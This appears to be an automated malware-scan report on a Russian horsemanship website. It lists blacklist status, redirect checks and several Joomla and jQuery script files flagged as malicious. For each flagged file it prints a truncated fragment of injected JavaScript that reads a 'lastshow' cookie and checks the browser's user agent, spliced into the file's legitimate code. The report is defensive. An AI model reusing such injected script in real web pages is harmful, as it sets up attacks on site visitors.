Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=naturalhorsemanship.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://naturalhorsemanship.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.naturalhorsemanship.ru/ | 200 OK Content-Length: 29655 Content-Type: text/html | clean |
http://www.naturalhorsemanship.ru/media/system/js/caption.js | 200 OK Content-Length: 2942 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); if ( element.title != "" ) { container.appendChild(text); } container.className = this.selector.replace('.', '_'); container.className = container.className + " " + align; container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); Antivirus reports:
| ||
http://www.naturalhorsemanship.ru/plugins/content/avreloaded/silverlight.js | 200 OK Content-Length: 9072 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); Antivirus reports:
| ||
http://www.naturalhorsemanship.ru/plugins/content/avreloaded/wmvplayer.js | 200 OK Content-Length: 17455 Content-Type: application/javascript | clean |
http://www.naturalhorsemanship.ru/plugins/content/avreloaded/swfobject.js | 200 OK Content-Length: 13233 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); Antivirus reports:
| ||
http://www.naturalhorsemanship.ru/plugins/content/avreloaded/avreloaded.js | 200 OK Content-Length: 3338 Content-Type: application/javascript | clean |
http://www.naturalhorsemanship.ru/modules/mod_simpleform2/ajax/jquery.js | 200 OK Content-Length: 71822 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); e.document.body["client"+b]:e.nodeType===9?Math.max(e.documentElement["client"+b],e.body["scroll"+b],e.documentElement["scroll"+b],e.body["offset"+b],e.documentElement["offset"+b]):f===v?c.css(e,d):this.css(d,typeof f==="string"?f:f+"px")}});z.jQuery=z.$=c})(window); Antivirus reports:
| ||
http://www.naturalhorsemanship.ru/modules/mod_simpleform2/ajax/jquery.form.js | 200 OK Content-Length: 21362 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); var $sel = $(this).parent('select'); if (select && $sel[0] && $sel[0].type == 'select-one') { $sel.find('option').selected(false); } this.selected = select; } }); }; function log() { if ($.fn.ajaxSubmit.debug && window.console && window.console.log) window.console.log('[jquery.form] ' + Array.prototype.join.call(arguments,'')); }; })(jQuery); Antivirus reports:
| ||
http://www.naturalhorsemanship.ru/modules/mod_scrolltotop/js/jquery-1.3.2.min.js | 200 OK Content-Length: 58233 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); Antivirus reports:
| ||
http://www.naturalhorsemanship.ru/modules/mod_scrolltotop/js/scrolltopcontrol.js | 200 OK Content-Length: 4849 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); .appendTo('body') if (document.all && !window.XMLHttpRequest && mainobj.$control.text()!='') mainobj.$control.css({width:mainobj.$control.width()}) mainobj.togglecontrol() $('a[href="' + mainobj.anchorkeyword +'"]').click(function(){ mainobj.scrollup() return false }) $(window).bind('scroll resize', function(e){ mainobj.togglecontrol() }) }) } } scrolltotop.init() Antivirus reports:
| ||
http://www.naturalhorsemanship.ru/templates/shablon_joomla/script.js | 200 OK Content-Length: 12034 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); e = e || window.event; button = e.target || e.srcElement; wrapper = button.parentNode; if (!artHasClass(button, 'active')) wrapper.className = wrapper.className.replace(/active/, ""); }); } } } artLoadEvent.add(function() { artButtonsSetupJsHover("art-button"); }); artLoadEvent.add(function() { artButtonsSetupJsHover("button"); artButtonsSetupJsHover("readon"); }); Antivirus reports:
| ||
http://www.naturalhorsemanship.ru/index.php?option=com_content&view=article&id=56&Itemid=4 | 200 OK Content-Length: 22842 Content-Type: text/html | clean |
http://www.naturalhorsemanship.ru/index.php?option=com_content&view=article&id=166&Itemid=104 | 200 OK Content-Length: 25861 Content-Type: text/html | clean |
http://www.naturalhorsemanship.ru/index.php?option=com_content&view=article&id=59&Itemid=50 | 200 OK Content-Length: 20095 Content-Type: text/html | clean |
http://www.naturalhorsemanship.ru/index.php?option=com_content&view=article&id=61&Itemid=51 | 200 OK Content-Length: 34799 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: naturalhorsemanship.ru
Result:
GET / HTTP/1.1
Host: naturalhorsemanship.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: naturalhorsemanship.ru
Referer: http://www.google.com/search?q=naturalhorsemanship.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: naturalhorsemanship.ru
Referer: http://www.google.com/search?q=naturalhorsemanship.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.